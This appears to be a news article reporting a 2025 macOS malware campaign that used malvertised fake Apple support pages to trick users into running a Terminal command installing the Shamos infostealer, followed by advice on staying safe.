Security researchers have revealed a new malware campaign that used fake Apple support pages to target Mac users. Between June and August 2025, CrowdStrike’s Falcon platform detected over 300 attempts to deliver Shamos, a variant of the Atomic Stealer malware.
The campaign was traced back to Cookie Spider, a criminal group that rents out malware on a subscription model. Instead of phishing emails, the attackers relied on malvertising. They bought paid search ads so that users searching for simple fixes—like how to flush a DNS cache—were directed to fake support sites.
How the attack worked
Once on these sites, users were told to paste a one-line command into Terminal. While it looked like a legitimate fix, the command bypassed Apple’s Gatekeeper security and downloaded a hidden installer.
At times, the command was plain text. Other times, it was disguised with Base64 encoding. Either way, it installed Shamos, which stole browser data, Apple Keychain entries, Notes, and cryptocurrency wallets. The malware then zipped the stolen data and exfiltrated it using curl, a common macOS tool.
Researchers also found Shamos deploying a fake Ledger Live app and a botnet module to expand its reach. To maintain persistence, it created a LaunchDaemons entry and checked for sandboxed environments to avoid detection.
Why it was effective
The campaign succeeded because it blended social engineering with technical jargon. Many users trusted what looked like Apple’s official guidance. By using search ads, attackers avoided shady email links or torrent sites.
Interestingly, the malware avoided targeting Russia and former Soviet states, a common tactic among cybercriminals seeking to avoid local law enforcement.
How to stay safe
Experts urge Mac users to be cautious. Copying Terminal commands from unverified websites poses serious risks. Instead, users should rely on Apple’s official documentation or trusted forums. Installing apps only from the Mac App Store or verified developer sites also helps reduce exposure.
Keeping macOS updated is another key defense. Endpoint protection tools, including CrowdStrike Falcon, can also block malicious scripts in real time. Above all, experts recommend skepticism: a few minutes spent verifying instructions could prevent major data theft.
